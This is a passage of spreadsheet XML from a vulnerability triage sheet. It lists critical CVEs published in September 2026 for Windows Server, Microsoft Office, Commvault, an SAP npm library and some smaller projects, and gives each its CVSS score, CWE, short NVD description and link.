          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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2" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79569</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79570</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79574</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79576</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79577</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65669</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>npm:@sap/cds-mtxs</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr">
        <is>
          <t>1.18.4, 2.7.7, 3.9.7, 4.0.3</t>
        </is>
      </c>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
